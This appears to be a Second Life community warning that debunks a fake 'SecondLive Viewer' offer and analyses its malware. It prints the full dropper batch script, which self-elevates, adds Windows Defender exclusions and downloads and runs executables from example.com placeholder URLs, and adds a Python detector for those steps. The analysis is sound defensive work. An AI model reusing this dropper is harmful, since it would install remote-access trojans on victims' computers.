This scam often starts as an instant message from someone in Second Life that looks like the following:
Hello,
Are you tired of spending your hard-earned Linden Dollars? We've got an exciting solution just for you! Introducing our SecondLive Viewer, where everything is not only free but also open for endless possibilities.
- Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
- Fly to unlimited heights.
- Build on any land of your choice, all for free.
But that's just the beginning.
Link: <Some URL, typically a tinyurl link>
We're sincerely thankful to everyone who joins us in our mission to make SecondLife completely free. Don't miss this incredible opportunity.
Best Regards.
- Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
This isn't possible. L$ isn't stored on the client. It is stored on the server that LL controls. You would need access to Linden Lab's servers, in which case:
- This is fraud, which is a crime. Generating L$ is not legal, and is a violation of both the Terms of Service and federal law.
- This is a violation of the Computer Fraud and Abuse Act, which covers unauthorized access to computers. (Servers count as computers!)
- Linden Lab would know instantly. They have systems in place to track if anyone logs into their servers in an unauthorized manner. They also have systems in place to detect fraudulent transactions.
- Linden Lab will track the money. No matter how many times you "launder" it, the money is tracked.
Simply put, there is no way to get free L$ other than the currently available methods in SL such as money trees and games.
- Fly to unlimited heights.
This isn't anything new. Most third party viewers already allow you to fly to unlimited heights. LL even removed the flight limit.
If you are using Firestorm:
- Paste this link in chat and click it:
secondlife:///app/openfloater/preferences?search=Enable%20usage%20of%20chat%20bar%20as%20a%20command%20line
- Enable "Enable use of chat bar as a command line"
- Type this in chat:
gth 50000
- Observe you are now 50000 meters in the air!
You can find out what each of these commands do here: https://wiki.firestormviewer.org/preferences_chat_tab#cmdline_tab
- Build on any land of your choice, all for free.
This isn't possible. Land permissions are checked by the simulator, not the viewer. While it is possible to edit your avatar on any land, it isn't possible to create or rez objects on any land. In some cases it may be possible to bring objects onto no-build land, such as scripted vehicles driving onto it; this is technically a feature.
A lot of stuff you don't want happening. I'll break it down into steps:
- You are instructed to download viewer.exe, which on execution pretends to install a viewer so that it looks legitimate.
- Upon running the newly installed program, it will run builddata.bat, which looks like this:
net session>nul 2>&1
if %errorlevel%==0 goto main
echo CreateObject("Shell.Application").ShellExecute "%~f0", "", "", "runas">"%temp%/elevate.vbs"
"%temp%/elevate.vbs"
del "%temp%/elevate.vbs"
exit
:main
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://example.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://example.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://example.com/A -OutFile A.exe;./A.exe;exit
This script elevates itself to administrator permissions ON YOUR COMPUTER! This is incredibly dangerous as it allows whatever is running to do what it wants. It also adds Windows Defender exclusions for C:\Users and Program Files, so the files it downloads are not scanned. Specifically, this script will download files called "V1", "Q", and "A":
- The script will execute "V1", which installs "1" and "2".
- "1" will install Trojan.CobaltStrike, a penetration testing toolkit which cybercriminals often abuse to gain remote administrative access.
- "2" will install Trojan.Molotov/Reflo. While I am not 100% sure about what it does, it is very likely another remote administration toolkit.
- "Q" will install Quasar, which is also a remote administration toolkit.
- "A" will install AsyncRAT which is also a remote administrative toolkit.
- Some of the tools will automatically install additional stuff not included in the script, such as a cryptominer.
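As an added example (not code from the original post or from any viewer project), here is a small Python triage script that flags the behaviours of builddata.bat described above: the runas self-elevation through Shell.Application, the hidden PowerShell window, the Defender exclusions, and each download that is executed immediately afterwards. The sample it scans is the script quoted in the post, with the example.com URLs as given there.

```python
import re

# Constructed sample: the builddata.bat dropper quoted in the post above (the
# download URLs were already replaced with example.com in the post).
SAMPLE_BAT = r"""net session>nul 2>&1
if %errorlevel%==0 goto main
echo CreateObject("Shell.Application").ShellExecute "%~f0", "", "", "runas">"%temp%/elevate.vbs"
"%temp%/elevate.vbs"
del "%temp%/elevate.vbs"
exit
:main
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://example.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://example.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://example.com/A -OutFile A.exe;./A.exe;exit
"""

# cmd.exe and PowerShell are case-insensitive, so every pattern is too.
# Relaunch of the script itself ("%~f0") through the "runas" verb: a UAC prompt
# that grants the whole script administrator rights if the user clicks Yes.
SELF_ELEVATE = re.compile(r'ShellExecute\s+"%~f0".*?"runas"', re.I)
HIDDEN_WINDOW = re.compile(r"-WindowStyle\s+hidden", re.I)
# Defender exclusion paths; the ones below cover essentially every user file.
EXCLUSION = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+([^\s;]+)", re.I)
BROAD_EXCLUSIONS = {"c:\\users", "$env:programfiles", "c:\\"}
# A download whose output file is executed in the very next statement.
FETCH_RUN = re.compile(
    r"Invoke-WebRequest\s+(?P<url>[^\s;]+)\s+-OutFile\s+(?P<file>[^\s;]+)"
    r"\s*;\s*(?:\.[/\\])?(?P=file)(?=\s|;|$)", re.I)


def analyze_dropper(text: str) -> dict:
    """Report which of the behaviours described in the post a script shows."""
    exclusions = EXCLUSION.findall(text)
    fetch_run = [(m.group("url"), m.group("file")) for m in FETCH_RUN.finditer(text)]
    report = {
        "self_elevation": bool(SELF_ELEVATE.search(text)),
        "hidden_window": bool(HIDDEN_WINDOW.search(text)),
        "defender_exclusions": exclusions,
        "broad_exclusions": [p for p in exclusions if p.lower() in BROAD_EXCLUSIONS],
        "download_execute": fetch_run,
    }
    findings = [k for k in ("self_elevation", "hidden_window") if report[k]]
    findings += [k for k in ("defender_exclusions", "download_execute") if report[k]]
    report["findings"] = findings
    # Any two of these together is enough to treat the file as a dropper.
    report["verdict"] = "dropper" if len(findings) >= 2 else "no_match"
    return report


if __name__ == "__main__":
    for key, value in analyze_dropper(SAMPLE_BAT).items():
        print(f"{key}: {value}")
```

The same checks can be run over any .bat or .ps1 file a user is asked to execute; a legitimate viewer installer has no reason to hide its window, exclude C:\Users from Defender, or fetch and run unsigned executables.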
- The script will execute start.vbs. Start.vbs just shows a fake dialog saying that there was an error:
x=msgbox ("The OpenGL driver detected a problem with the display driver and is unable to continue. The application must close. Error code:3",0+64,"Error")
Attackers will intentionally install as many backdoors as possible so that it becomes increasingly difficult to remove, to the point where you should probably just wipe your hard drive and re-install your operating system.
Yes and no:
- No: The script itself doesn't install anything else.
- Yes: However, when each of the remote administrative toolkits is installed, it contacts a server, and that server can tell the toolkit to install even more.
While I could do further investigation, it involves going further than I feel reasonably safe doing so.
A remote administrative toolkit (also known as a RAT) is basically like giving someone physical access to your computer. They can do the following, among other things:
- Steal your username / passwords
- Steal your browser cookies
- Steal your files
- Steal your banking information
- Steal your L$
- Steal your REAL WORLD money (through credit / banking / wire fraud)
- View your webcam and take pictures/videos
- View your desktop
- Install additional software
- Encrypt your files
- Delete your files
A cryptominer abuses your GPU to mine cryptocurrency such as Bitcoin. This wastes electricity and computing power, and also degrades your graphics card. And you do not see a dime of what they make. It's basically turning your computer into a mining slave.
- Turn the computer that you installed it on OFF immediately! If the computer is off, they can't access it. Make sure you do not put it in a "sleep" state where the CPU is still operating in a lower power mode; make sure it is OFF off!
- Take your device to a computer technician who specializes in removing viruses and malware. Be prepared to have your files backed up and the system re-installed.
- Do not be tempted to use it until it is cleaned! Malware can spread over internal networks, and every moment it is on is a chance for the hacker to steal more data from you!
- "viewer.exe" malware scan: https://www.virustotal.com/gui/file/b06bc0bac2af08133893a604abe30e6ea0195539eee6fad7750c812a422de3de
- "Q" malware scan: https://www.virustotal.com/gui/file/db548cd27e4828afc8ed7a2e61da467a814082e57d7b860c6c8ecf0a1b6ddf4f
- "A" malware scan: https://www.virustotal.com/gui/file/e8cfa912e022bed8fcf57d3a03a3f5a1780b5cd547b7c190029d7b082632215a
- "1" malware scan: https://www.virustotal.com/gui/file/de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a
- "2" malware scan: https://www.virustotal.com/gui/file/2ef3678bf54e37a4ae0161e0a3a76a68d05f75164874af3ce6febd1d759f6109
The one and only official site to download the Cool VL Viewer binaries and sources is http://sldev.free.fr/
Anyone being offered my viewer by any third party should never accept it and immediately report to me.